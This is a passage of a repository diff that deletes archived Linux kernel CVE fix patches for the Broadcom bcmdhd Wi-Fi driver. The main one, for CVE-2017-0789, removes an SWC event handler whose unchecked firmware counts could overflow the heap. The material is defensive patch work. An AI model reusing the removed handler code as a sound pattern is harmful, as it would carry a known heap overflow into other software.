- wl_pfn_scanresults_t *pfn_result = (wl_pfn_scanresults_t *)data;
- wl_pfn_net_info_t *net;
--
-+ if ((pfn_result->count == 0) ||
-+ (pfn_result->count > EVENT_MAX_NETCNT)) {
-+ DHD_ERROR(("%s event %d: incorrect results count:%d\n",
-+ __FUNCTION__, event, pfn_result->count));
-+ return NULL;
-+ }
- if (pfn_result->version != PFN_SCANRESULT_VERSION) {
- DHD_ERROR(("%s event %d: Incorrect version %d %d\n", __FUNCTION__, event,
- pfn_result->version, PFN_SCANRESULT_VERSION));
-@@ -3690,7 +3700,9 @@ void *dhd_handle_hotlist_scan_evt(dhd_pub_t *dhd, const void *event_data, int *s
-
- gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan);
-
-- if (!results->count) {
-+ if ((results->count == 0) || (results->count > EVENT_MAX_NETCNT)) {
-+ DHD_ERROR(("%s: wrong count:%d\n", __FUNCTION__,
-+ results->count));
- *send_evt_bytes = 0;
- return ptr;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0789/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0789/ANY/0001.patch
deleted file mode 100644
index 4ff22daf..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0789/ANY/0001.patch
+++ /dev/null
@@ -1,661 +0,0 @@ -From 58168423faa39f5062047eb1d16d294902f0f48b Mon Sep 17 00:00:00 2001 -From: Sudhir Kohalli -Date: Thu, 22 Jun 2017 11:48:53 -0700 -Subject: net: wireless: bcmdhd: Remove "dhd_handle_swc_evt" from dhd. - -Remove SWC(siginificant wifi change) from the host. Since current -feature is no longer being used. If needed will get the feature -back. Due to this there will not any heap overflow in -"dhd_handle_swc_evt" will be observed. - -Signed-off-by: Sudhir Kohalli -Bug: 37685267 -Change-Id: Ib03a39626223e27079f2b3f91564eb21025e57cf ---- - drivers/net/wireless/bcmdhd/bcmevent.c | 1 - - drivers/net/wireless/bcmdhd/dhd_common.c | 1 - - drivers/net/wireless/bcmdhd/dhd_linux.c | 9 - - drivers/net/wireless/bcmdhd/dhd_pno.c | 240 +-------------------- - drivers/net/wireless/bcmdhd/dhd_pno.h | 45 ++-- - .../net/wireless/bcmdhd/include/proto/bcmevent.h | 2 +- - drivers/net/wireless/bcmdhd/include/wlioctl.h | 6 - - drivers/net/wireless/bcmdhd/wl_cfg80211.c | 9 - - drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 108 ---------- - 9 files changed, 22 insertions(+), 399 deletions(-) - -diff --git a/drivers/net/wireless/bcmdhd/bcmevent.c b/drivers/net/wireless/bcmdhd/bcmevent.c -index 7ed9739..30e10d9 100644 ---- a/drivers/net/wireless/bcmdhd/bcmevent.c -+++ b/drivers/net/wireless/bcmdhd/bcmevent.c -@@ -157,7 +157,6 @@ static const bcmevent_name_str_t bcmevent_names[] = { - BCMEVENT_NAME(WLC_E_TXFAIL_THRESH), - #ifdef GSCAN_SUPPORT - BCMEVENT_NAME(WLC_E_PFN_GSCAN_FULL_RESULT), -- BCMEVENT_NAME(WLC_E_PFN_SWC), - #endif /* GSCAN_SUPPORT */ - #ifdef WLBSSLOAD_REPORT - BCMEVENT_NAME(WLC_E_BSS_LOAD), -diff --git a/drivers/net/wireless/bcmdhd/dhd_common.c b/drivers/net/wireless/bcmdhd/dhd_common.c -index 1fbb5c4..d3f04a7 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_common.c -+++ b/drivers/net/wireless/bcmdhd/dhd_common.c -@@ -1325,7 +1325,6 @@ wl_show_host_event(dhd_pub_t *dhd_pub, wl_event_msg_t *event, void *event_data, - case WLC_E_PFN_SCAN_NONE: - case 
WLC_E_PFN_SCAN_ALLGONE: - case WLC_E_PFN_GSCAN_FULL_RESULT: -- case WLC_E_PFN_SWC: - case WLC_E_PFN_SSID_EXT: - DHD_EVENT(("PNOEVENT: %s\n", event_name)); - break; -diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.c b/drivers/net/wireless/bcmdhd/dhd_linux.c -index abc4331..101b03a 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_linux.c -+++ b/drivers/net/wireless/bcmdhd/dhd_linux.c -@@ -6066,7 +6066,6 @@ dhd_preinit_ioctls(dhd_pub_t *dhd) - #ifdef GSCAN_SUPPORT - setbit(eventmask_msg->mask, WLC_E_PFN_GSCAN_FULL_RESULT); - setbit(eventmask_msg->mask, WLC_E_PFN_SCAN_COMPLETE); -- setbit(eventmask_msg->mask, WLC_E_PFN_SWC); - setbit(eventmask_msg->mask, WLC_E_PFN_SSID_EXT); - setbit(eventmask_msg->mask, WLC_E_ROAM_EXP_EVENT); - #endif /* GSCAN_SUPPORT */ -@@ -8401,14 +8400,6 @@ int dhd_dev_pno_enable_full_scan_result(struct net_device *dev, bool real_time_f - return (dhd_pno_enable_full_scan_result(&dhd->pub, real_time_flag)); - } - --/* Linux wrapper to call common dhd_handle_swc_evt */ --void * dhd_dev_swc_scan_event(struct net_device *dev, const void *data, int *send_evt_bytes) --{ -- dhd_info_t *dhd = *(dhd_info_t **)netdev_priv(dev); -- -- return (dhd_handle_swc_evt(&dhd->pub, data, send_evt_bytes)); --} -- - /* Linux wrapper to call common dhd_handle_hotlist_scan_evt */ - void * dhd_dev_hotlist_scan_event(struct net_device *dev, - const void *data, int *send_evt_bytes, hotlist_type_t type) -diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c -index 3103f89..8ebdf53 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_pno.c -+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c -@@ -1028,34 +1028,6 @@ exit: - return err; - } - --#ifdef GSCAN_SUPPORT --static int --_dhd_pno_add_significant_bssid(dhd_pub_t *dhd, -- wl_pfn_significant_bssid_t *p_pfn_significant_bssid, int nbssid) --{ -- int err = BCME_OK; -- NULL_CHECK(dhd, "dhd is NULL", err); -- -- if (!nbssid) { -- err = BCME_ERROR; -- goto exit; -- } -- -- 
NULL_CHECK(p_pfn_significant_bssid, "bssid list is NULL", err); -- -- err = dhd_iovar(dhd, 0, "pfn_add_swc_bssid", -- (char *)p_pfn_significant_bssid, -- sizeof(wl_pfn_significant_bssid_t) * nbssid, NULL, 0, -- TRUE); -- if (err < 0) { -- DHD_ERROR(("%s : failed to execute pfn_significant_bssid %d\n", __FUNCTION__, err)); -- goto exit; -- } --exit: -- return err; --} --#endif /* GSCAN_SUPPORT */ -- - int - dhd_pno_stop_for_ssid(dhd_pub_t *dhd) - { -@@ -1654,19 +1626,6 @@ static void dhd_pno_reset_cfg_gscan(dhd_pno_params_t *_params, - _params->params_gscan.nbssid_hotlist = 0; - DHD_PNO(("Flush Hotlist Config\n")); - } -- if (flags & GSCAN_FLUSH_SIGNIFICANT_CFG) { -- dhd_pno_significant_bssid_t *iter, *next; -- -- if (_params->params_gscan.nbssid_significant_change > 0) { -- list_for_each_entry_safe(iter, next, -- &_params->params_gscan.significant_bssid_list, list) { -- list_del(&iter->list); -- kfree(iter); -- } -- } -- _params->params_gscan.nbssid_significant_change = 0; -- DHD_PNO(("Flush Significant Change Config\n")); -- } - if (flags & GSCAN_FLUSH_EPNO_CFG) { - dhd_pno_ssid_t *iter, *next; - dhd_epno_ssid_cfg_t *epno_cfg = &_params->params_gscan.epno_cfg; -@@ -1808,8 +1767,10 @@ void * dhd_pno_get_gscan(dhd_pub_t *dhd, dhd_pno_gscan_cmd_cfg_t type, - ptr->max_ap_cache_per_scan = GSCAN_MAX_AP_CACHE_PER_SCAN; - ptr->max_rssi_sample_size = PFN_SWC_RSSI_WINDOW_MAX; - ptr->max_scan_reporting_threshold = 100; -- ptr->max_hotlist_aps = PFN_HOTLIST_MAX_NUM_APS; -- ptr->max_significant_wifi_change_aps = PFN_SWC_MAX_NUM_APS; -+ ptr->max_hotlist_bssids = PFN_HOTLIST_MAX_NUM_APS; -+ ptr->max_hotlist_ssids = 0; -+ ptr->max_significant_wifi_change_aps = 0; -+ ptr->max_bssid_history_entries = 0; - ptr->max_epno_ssid_crc32 = MAX_EPNO_SSID_NUM; - ptr->max_epno_hidden_ssid = MAX_EPNO_HIDDEN_SSID; - ptr->max_white_list_ssid = MAX_WHITELIST_SSID; -@@ -1943,10 +1904,10 @@ int dhd_pno_set_cfg_gscan(dhd_pub_t *dhd, dhd_pno_gscan_cmd_cfg_t type, - 
INIT_LIST_HEAD(&_params->params_gscan.hotlist_bssid_list); - - if ((_params->params_gscan.nbssid_hotlist + -- ptr->nbssid) > PFN_SWC_MAX_NUM_APS) { -+ ptr->nbssid) > PFN_SWC_MAX_NUM_APS) { - DHD_ERROR(("Excessive number of hotlist APs programmed %d\n", -- (_params->params_gscan.nbssid_hotlist + -- ptr->nbssid))); -+ (_params->params_gscan.nbssid_hotlist + -+ ptr->nbssid))); - err = BCME_RANGE; - goto exit; - } -@@ -1972,61 +1933,6 @@ int dhd_pno_set_cfg_gscan(dhd_pub_t *dhd, dhd_pno_gscan_cmd_cfg_t type, - _params->params_gscan.lost_ap_window = ptr->lost_ap_window; - } - break; -- case DHD_PNO_SIGNIFICANT_SCAN_CFG_ID: -- { -- gscan_swc_params_t *ptr = (gscan_swc_params_t *)buf; -- dhd_pno_significant_bssid_t *_pno_significant_change_bssid; -- wl_pfn_significant_bssid_t *significant_bssid_ptr; -- -- if (flush) { -- dhd_pno_reset_cfg_gscan(_params, _pno_state, -- GSCAN_FLUSH_SIGNIFICANT_CFG); -- } -- -- if (!ptr->nbssid) -- break; -- -- if (!_params->params_gscan.nbssid_significant_change) -- INIT_LIST_HEAD(&_params->params_gscan.significant_bssid_list); -- -- if ((_params->params_gscan.nbssid_significant_change + -- ptr->nbssid) > PFN_SWC_MAX_NUM_APS) { -- DHD_ERROR(("Excessive number of SWC APs programmed %d\n", -- (_params->params_gscan.nbssid_significant_change + -- ptr->nbssid))); -- err = BCME_RANGE; -- goto exit; -- } -- -- for (i = 0, significant_bssid_ptr = ptr->bssid_elem_list; -- i < ptr->nbssid; i++, significant_bssid_ptr++) { -- _pno_significant_change_bssid = -- kzalloc(sizeof(dhd_pno_significant_bssid_t), -- GFP_KERNEL); -- -- if (!_pno_significant_change_bssid) { -- DHD_ERROR(("SWC bssidptr is NULL, cannot kalloc %zd bytes", -- sizeof(dhd_pno_significant_bssid_t))); -- err = BCME_NOMEM; -- goto exit; -- } -- memcpy(&_pno_significant_change_bssid->BSSID, -- &significant_bssid_ptr->macaddr, ETHER_ADDR_LEN); -- _pno_significant_change_bssid->rssi_low_threshold = -- significant_bssid_ptr->rssi_low_threshold; -- 
_pno_significant_change_bssid->rssi_high_threshold = -- significant_bssid_ptr->rssi_high_threshold; -- list_add_tail(&_pno_significant_change_bssid->list, -- &_params->params_gscan.significant_bssid_list); -- } -- -- _params->params_gscan.swc_nbssid_threshold = ptr->swc_threshold; -- _params->params_gscan.swc_rssi_window_size = ptr->rssi_window; -- _params->params_gscan.lost_ap_window = ptr->lost_ap_window; -- _params->params_gscan.nbssid_significant_change += ptr->nbssid; -- -- } -- break; - case DHD_PNO_SCAN_CFG_ID: - { - int i, k; -@@ -2145,7 +2051,6 @@ dhd_pno_set_for_gscan(dhd_pub_t *dhd, struct dhd_pno_gscan_params *gscan_params) - dhd_pno_status_info_t *_pno_state = PNO_GET_PNOSTATE(dhd); - wl_pfn_gscan_ch_bucket_cfg_t *ch_bucket = NULL; - wl_pfn_gscan_cfg_t *pfn_gscan_cfg_t = NULL; -- wl_pfn_significant_bssid_t *p_pfn_significant_bssid = NULL; - wl_pfn_bssid_t *p_pfn_bssid = NULL; - dhd_pno_params_t *params_legacy; - dhd_pno_params_t *_params; -@@ -2219,7 +2124,8 @@ dhd_pno_set_for_gscan(dhd_pub_t *dhd, struct dhd_pno_gscan_params *gscan_params) - - gscan_param_size = sizeof(wl_pfn_gscan_cfg_t) + - (num_buckets_to_fw - 1) * sizeof(wl_pfn_gscan_ch_bucket_cfg_t); -- pfn_gscan_cfg_t = (wl_pfn_gscan_cfg_t *) MALLOC(dhd->osh, gscan_param_size); -+ pfn_gscan_cfg_t = (wl_pfn_gscan_cfg_t *) -+ MALLOCZ(dhd->osh, gscan_param_size); - - if (!pfn_gscan_cfg_t) { - DHD_ERROR(("%s: failed to malloc memory of size %d\n", -@@ -2234,16 +2140,6 @@ dhd_pno_set_for_gscan(dhd_pub_t *dhd, struct dhd_pno_gscan_params *gscan_params) - else - pfn_gscan_cfg_t->buffer_threshold = GSCAN_BATCH_NO_THR_SET; - -- if (gscan_params->nbssid_significant_change) { -- pfn_gscan_cfg_t->swc_nbssid_threshold = gscan_params->swc_nbssid_threshold; -- pfn_gscan_cfg_t->swc_rssi_window_size = gscan_params->swc_rssi_window_size; -- pfn_gscan_cfg_t->lost_ap_window = gscan_params->lost_ap_window; -- } else { -- pfn_gscan_cfg_t->swc_nbssid_threshold = 0; -- pfn_gscan_cfg_t->swc_rssi_window_size = 0; -- 
pfn_gscan_cfg_t->lost_ap_window = 0; -- } -- - pfn_gscan_cfg_t->flags = - (gscan_params->send_all_results_flag & GSCAN_SEND_ALL_RESULTS_MASK); - pfn_gscan_cfg_t->count_of_channel_buckets = num_buckets_to_fw; -@@ -2277,38 +2173,6 @@ dhd_pno_set_for_gscan(dhd_pub_t *dhd, struct dhd_pno_gscan_params *gscan_params) - __FUNCTION__, err)); - goto exit; - } -- if (gscan_params->nbssid_significant_change) { -- dhd_pno_significant_bssid_t *iter, *next; -- -- p_pfn_significant_bssid = kzalloc(sizeof(wl_pfn_significant_bssid_t) * -- gscan_params->nbssid_significant_change, GFP_KERNEL); -- if (p_pfn_significant_bssid == NULL) { -- DHD_ERROR(("%s : failed to allocate memory %zd\n", -- __FUNCTION__, -- sizeof(wl_pfn_significant_bssid_t) * -- gscan_params->nbssid_significant_change)); -- err = BCME_NOMEM; -- goto exit; -- } -- i = 0; -- /* convert dhd_pno_significant_bssid_t to wl_pfn_significant_bssid_t */ -- list_for_each_entry_safe(iter, next, &gscan_params->significant_bssid_list, list) { -- p_pfn_significant_bssid[i].rssi_low_threshold = iter->rssi_low_threshold; -- p_pfn_significant_bssid[i].rssi_high_threshold = iter->rssi_high_threshold; -- memcpy(&p_pfn_significant_bssid[i].macaddr, &iter->BSSID, ETHER_ADDR_LEN); -- i++; -- } -- -- DHD_PNO(("nbssid_significant_change %d \n", -- gscan_params->nbssid_significant_change)); -- err = _dhd_pno_add_significant_bssid(dhd, p_pfn_significant_bssid, -- gscan_params->nbssid_significant_change); -- if (err < 0) { -- DHD_ERROR(("%s : failed to call _dhd_pno_add_significant_bssid(err :%d)\n", -- __FUNCTION__, err)); -- goto exit; -- } -- } - /* Reprogram ePNO cfg from dhd cache if FW has been flushed */ - if (fw_flushed) { - dhd_pno_set_epno(dhd); -@@ -2362,7 +2226,6 @@ exit: - _pno_state->pno_mode &= ~DHD_PNO_GSCAN_MODE; - } - } -- kfree(p_pfn_significant_bssid); - kfree(p_pfn_bssid); - if (pfn_gscan_cfg_t) - MFREE(dhd->osh, pfn_gscan_cfg_t, gscan_param_size); -@@ -3581,91 +3444,6 @@ int dhd_retreive_batch_scan_results(dhd_pub_t *dhd) 
- return err; - } - --/* Handle Significant WiFi Change (SWC) event from FW -- * Send event to HAL when all results arrive from FW -- */ --void * dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_bytes) --{ -- void *ptr = NULL; -- dhd_pno_status_info_t *_pno_state = PNO_GET_PNOSTATE(dhd); -- struct dhd_pno_gscan_params *gscan_params; -- struct dhd_pno_swc_evt_param *params; -- wl_pfn_swc_results_t *results = (wl_pfn_swc_results_t *)event_data; -- wl_pfn_significant_net_t *change_array; -- int i; -- -- gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan); -- params = &(gscan_params->param_significant); -- -- if (!results->total_count) { -- *send_evt_bytes = 0; -- return ptr; -- } -- -- if (!params->results_rxed_so_far) { -- if (!params->change_array) { -- params->change_array = (wl_pfn_significant_net_t *) -- kmalloc(sizeof(wl_pfn_significant_net_t) * results->total_count, -- GFP_KERNEL); -- -- if (!params->change_array) { -- DHD_ERROR(("%s Cannot Malloc %zd bytes!!\n", __FUNCTION__, -- sizeof(wl_pfn_significant_net_t) * results->total_count)); -- *send_evt_bytes = 0; -- return ptr; -- } -- } else { -- DHD_ERROR(("RX'ed WLC_E_PFN_SWC evt from FW, previous evt not complete!!")); -- *send_evt_bytes = 0; -- return ptr; -- } -- -- } -- -- DHD_PNO(("%s: pkt_count %d total_count %d\n", __FUNCTION__, -- results->pkt_count, results->total_count)); -- -- for (i = 0; i < results->pkt_count; i++) { -- DHD_PNO(("\t %02x:%02x:%02x:%02x:%02x:%02x\n", -- results->list[i].BSSID.octet[0], -- results->list[i].BSSID.octet[1], -- results->list[i].BSSID.octet[2], -- results->list[i].BSSID.octet[3], -- results->list[i].BSSID.octet[4], -- results->list[i].BSSID.octet[5])); -- } -- -- change_array = ¶ms->change_array[params->results_rxed_so_far]; -- if ((params->results_rxed_so_far + results->pkt_count) > -- results->total_count) { -- DHD_ERROR(("Error: Invalid data reset the counters!!\n")); -- *send_evt_bytes = 0; -- 
kfree(params->change_array); -- params->change_array = NULL; -- return ptr; -- } -- -- memcpy(change_array, results->list, -- sizeof(wl_pfn_significant_net_t) * results->pkt_count); -- params->results_rxed_so_far += results->pkt_count; -- -- if (params->results_rxed_so_far == results->total_count) { -- params->results_rxed_so_far = 0; -- *send_evt_bytes = sizeof(wl_pfn_significant_net_t) * results->total_count; -- /* Pack up change buffer to send up and reset -- * results_rxed_so_far, after its done. -- */ -- ptr = (void *) params->change_array; -- /* expecting the callee to free this mem chunk */ -- params->change_array = NULL; -- } -- else { -- *send_evt_bytes = 0; -- } -- -- return ptr; --} -- - void dhd_gscan_hotlist_cache_cleanup(dhd_pub_t *dhd, hotlist_type_t type) - { - dhd_pno_status_info_t *_pno_state = PNO_GET_PNOSTATE(dhd); -diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.h b/drivers/net/wireless/bcmdhd/dhd_pno.h -index 3398752..9a348f9 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_pno.h -+++ b/drivers/net/wireless/bcmdhd/dhd_pno.h -@@ -359,16 +359,18 @@ typedef struct { - } wifi_passpoint_network; - - typedef struct dhd_pno_gscan_capabilities { -- int max_scan_cache_size; -- int max_scan_buckets; -- int max_ap_cache_per_scan; -- int max_rssi_sample_size; -- int max_scan_reporting_threshold; -- int max_hotlist_aps; -- int max_significant_wifi_change_aps; -- int max_epno_ssid_crc32; -- int max_epno_hidden_ssid; -- int max_white_list_ssid; -+ int max_scan_cache_size; -+ int max_scan_buckets; -+ int max_ap_cache_per_scan; -+ int max_rssi_sample_size; -+ int max_scan_reporting_threshold; -+ int max_hotlist_bssids; -+ int max_hotlist_ssids; -+ int max_significant_wifi_change_aps; -+ int max_bssid_history_entries; -+ int max_epno_ssid_crc32; -+ int max_epno_hidden_ssid; -+ int max_white_list_ssid; - } dhd_pno_gscan_capabilities_t; - - typedef struct dhd_epno_ssid_cfg { -@@ -426,26 +428,6 @@ typedef struct gscan_hotlist_scan_params { - struct bssid_t bssid[1]; 
/* n bssids to follow */ - } gscan_hotlist_scan_params_t; - --/* SWC (Significant WiFi Change) params */ --typedef struct gscan_swc_params { -- /* Rssi averaging window size */ -- uint8 rssi_window; -- /* Number of scans that the AP has to be absent before -- * being declared LOST -- */ -- uint8 lost_ap_window; -- /* if x Aps have a significant change generate an event. */ -- uint8 swc_threshold; -- uint8 nbssid; -- wl_pfn_significant_bssid_t bssid_elem_list[1]; --} gscan_swc_params_t; -- --typedef struct dhd_pno_significant_bssid { -- struct ether_addr BSSID; -- int8 rssi_low_threshold; -- int8 rssi_high_threshold; -- struct list_head list; --} dhd_pno_significant_bssid_t; - #endif /* GSCAN_SUPPORT */ - typedef union dhd_pno_params { - struct dhd_pno_legacy_params params_legacy; -@@ -506,8 +488,6 @@ int dhd_dev_pno_lock_access_batch_results(struct net_device *dev); - void dhd_dev_pno_unlock_access_batch_results(struct net_device *dev); - extern int dhd_dev_pno_run_gscan(struct net_device *dev, bool run, bool flush); - extern int dhd_dev_pno_enable_full_scan_result(struct net_device *dev, bool real_time); --extern void * dhd_dev_swc_scan_event(struct net_device *dev, const void *data, -- int *send_evt_bytes); - int dhd_retreive_batch_scan_results(dhd_pub_t *dhd); - extern void * dhd_dev_hotlist_scan_event(struct net_device *dev, - const void *data, int *send_evt_bytes, hotlist_type_t type); -@@ -560,7 +540,6 @@ extern int dhd_pno_initiate_gscan_request(dhd_pub_t *dhd, bool run, bool flush); - extern int dhd_pno_enable_full_scan_result(dhd_pub_t *dhd, bool real_time_flag); - extern int dhd_pno_cfg_gscan(dhd_pub_t *dhd, dhd_pno_gscan_cmd_cfg_t type, void *buf); - extern int dhd_dev_retrieve_batch_scan(struct net_device *dev); --extern void *dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_bytes); - extern void *dhd_handle_hotlist_scan_evt(dhd_pub_t *dhd, const void *event_data, - int *send_evt_bytes, hotlist_type_t type); - extern void * -diff 
--git a/drivers/net/wireless/bcmdhd/include/proto/bcmevent.h b/drivers/net/wireless/bcmdhd/include/proto/bcmevent.h -index 098da15..d6f7cd4 100644 ---- a/drivers/net/wireless/bcmdhd/include/proto/bcmevent.h -+++ b/drivers/net/wireless/bcmdhd/include/proto/bcmevent.h -@@ -236,7 +236,7 @@ typedef union bcm_event_msg_u { - #define WLC_E_FBT_AUTH_REQ_IND 132 /* FBT Authentication Request Indication */ - #define WLC_E_RSSI_LQM 133 /* Enhancement addition for WLC_E_RSSI */ - #define WLC_E_PFN_GSCAN_FULL_RESULT 134 /* Full probe/beacon (IEs etc) results */ --#define WLC_E_PFN_SWC 135 /* Significant change in rssi of bssids being tracked */ -+/* 135 was legacy entry for WLC_E_PFN_SWC can be reused */ - #define WLC_E_PFN_SCAN_COMPLETE 138 /* PFN completed scan of network list */ - #define WLC_E_RMC_EVENT 139 /* RMC event */ - #define WLC_E_PFN_SSID_EXT 142 /* SSID EXT event */ -diff --git a/drivers/net/wireless/bcmdhd/include/wlioctl.h b/drivers/net/wireless/bcmdhd/include/wlioctl.h -index 808a0bf..b89c4be 100644 ---- a/drivers/net/wireless/bcmdhd/include/wlioctl.h -+++ b/drivers/net/wireless/bcmdhd/include/wlioctl.h -@@ -2705,12 +2705,6 @@ typedef struct wl_pfn_bssid { - uint16 flags; - } wl_pfn_bssid_t; - --typedef struct wl_pfn_significant_bssid { -- struct ether_addr macaddr; -- int8 rssi_low_threshold; -- int8 rssi_high_threshold; --} wl_pfn_significant_bssid_t; -- - #define WL_PFN_SUPPRESSFOUND_MASK 0x08 - #define WL_PFN_SUPPRESSLOST_MASK 0x10 - #define WL_PFN_RSSI_MASK 0xff00 -diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c -index 1d1e2a8..e7ababd 100644 ---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c -+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c -@@ -9397,14 +9397,6 @@ wl_notify_gscan_event(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev, - u32 len = ntoh32(e->datalen); - - switch (event) { -- case WLC_E_PFN_SWC: -- ptr = dhd_dev_swc_scan_event(ndev, data, &send_evt_bytes); -- if (send_evt_bytes) { -- 
wl_cfgvendor_send_async_event(wiphy, ndev, -- GOOGLE_GSCAN_SIGNIFICANT_EVENT, ptr, send_evt_bytes); -- kfree(ptr); -- } -- break; - case WLC_E_PFN_BEST_BATCHING: - err = dhd_dev_retrieve_batch_scan(ndev); - if (err < 0) { -@@ -10094,7 +10086,6 @@ static void wl_init_event_handler(struct bcm_cfg80211 *cfg) - cfg->evt_handler[WLC_E_PFN_BEST_BATCHING] = wl_notify_gscan_event; - cfg->evt_handler[WLC_E_PFN_SCAN_COMPLETE] = wl_notify_gscan_event; - cfg->evt_handler[WLC_E_PFN_GSCAN_FULL_RESULT] = wl_notify_gscan_event; -- cfg->evt_handler[WLC_E_PFN_SWC] = wl_notify_gscan_event; - cfg->evt_handler[WLC_E_PFN_BSSID_NET_FOUND] = wl_notify_gscan_event; - cfg->evt_handler[WLC_E_PFN_BSSID_NET_LOST] = wl_notify_gscan_event; - cfg->evt_handler[WLC_E_PFN_SSID_EXT] = wl_notify_gscan_event; -diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -index 4e5fee0..140a20d 100644 ---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -@@ -1158,106 +1158,6 @@ static int wl_cfgvendor_set_batch_scan_cfg(struct wiphy *wiphy, - return err; - } - --static int wl_cfgvendor_significant_change_cfg(struct wiphy *wiphy, -- struct wireless_dev *wdev, const void *data, int len) --{ -- int err = 0; -- struct bcm_cfg80211 *cfg = wiphy_priv(wiphy); -- gscan_swc_params_t *significant_params; -- int tmp, tmp1, tmp2, type, j = 0; -- const struct nlattr *outer, *inner, *iter; -- bool flush = FALSE; -- wl_pfn_significant_bssid_t *pbssid; -- uint16 num_bssid = 0; -- uint16 max_buf_size = sizeof(gscan_swc_params_t) + -- sizeof(wl_pfn_significant_bssid_t) * (PFN_SWC_MAX_NUM_APS - 1); -- -- significant_params = kzalloc(max_buf_size, GFP_KERNEL); -- -- if (!significant_params) { -- WL_ERR(("Cannot Malloc mem size:%d\n", len)); -- return BCME_NOMEM; -- } -- -- -- nla_for_each_attr(iter, data, len, tmp2) { -- type = nla_type(iter); -- -- switch (type) { -- case GSCAN_ATTRIBUTE_SIGNIFICANT_CHANGE_FLUSH: -- flush = (bool) 
nla_get_u8(iter); -- break; -- case GSCAN_ATTRIBUTE_RSSI_SAMPLE_SIZE: -- significant_params->rssi_window = nla_get_u16(iter); -- break; -- case GSCAN_ATTRIBUTE_LOST_AP_SAMPLE_SIZE: -- significant_params->lost_ap_window = nla_get_u16(iter); -- break; -- case GSCAN_ATTRIBUTE_MIN_BREACHING: -- significant_params->swc_threshold = nla_get_u16(iter); -- break; -- case GSCAN_ATTRIBUTE_NUM_BSSID: -- num_bssid = nla_get_u16(iter); -- if (num_bssid > PFN_SWC_MAX_NUM_APS) { -- WL_ERR(("ovar max SWC bssids:%d\n", -- num_bssid)); -- err = BCME_BADARG; -- goto exit; -- } -- break; -- case GSCAN_ATTRIBUTE_SIGNIFICANT_CHANGE_BSSIDS: -- if (num_bssid == 0) { -- WL_ERR(("num_bssid : 0\n")); -- err = BCME_BADARG; -- goto exit; -- } -- pbssid = significant_params->bssid_elem_list; -- nla_for_each_nested(outer, iter, tmp) { -- if (j >= num_bssid) { -- j++; -- break; -- } -- nla_for_each_nested(inner, outer, tmp1) { -- switch (nla_type(inner)) { -- case GSCAN_ATTRIBUTE_BSSID: -- memcpy(&(pbssid[j].macaddr), -- nla_data(inner), -- ETHER_ADDR_LEN); -- break; -- case GSCAN_ATTRIBUTE_RSSI_HIGH: -- pbssid[j].rssi_high_threshold = -- (int8) nla_get_u8(inner); -- break; -- case GSCAN_ATTRIBUTE_RSSI_LOW: -- pbssid[j].rssi_low_threshold = -- (int8) nla_get_u8(inner); -- break; -- } -- } -- j++; -- } -- break; -- } -- } -- if (j != num_bssid) { -- WL_ERR(("swc bssids count:%d not matched to num_bssid:%d\n", -- j, num_bssid)); -- err = BCME_BADARG; -- goto exit; -- } -- significant_params->nbssid = j; -- -- if (dhd_dev_pno_set_cfg_gscan(bcmcfg_to_prmry_ndev(cfg), -- DHD_PNO_SIGNIFICANT_SCAN_CFG_ID, significant_params, flush) < 0) { -- WL_ERR(("Could not set GSCAN significant cfg\n")); -- err = -EINVAL; -- goto exit; -- } --exit: -- kfree(significant_params); -- return err; --} -- - static int wl_cfgvendor_enable_lazy_roam(struct wiphy *wiphy, - struct wireless_dev *wdev, const void *data, int len) - { -@@ -3013,14 +2913,6 @@ static const struct wiphy_vendor_command wl_vendor_cmds [] = { - { - { - 
.vendor_id = OUI_GOOGLE, -- .subcmd = GSCAN_SUBCMD_SET_SIGNIFICANT_CHANGE_CONFIG -- }, -- .flags = WIPHY_VENDOR_CMD_NEED_WDEV | WIPHY_VENDOR_CMD_NEED_NETDEV, -- .doit = wl_cfgvendor_significant_change_cfg -- }, -- { -- { -- .vendor_id = OUI_GOOGLE, - .subcmd = GSCAN_SUBCMD_GET_SCAN_RESULTS - }, - .flags = WIPHY_VENDOR_CMD_NEED_WDEV | WIPHY_VENDOR_CMD_NEED_NETDEV, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0790/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0790/ANY/0001.patch deleted file mode 100644 index b155460d..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0790/ANY/0001.patch +++ /dev/null 
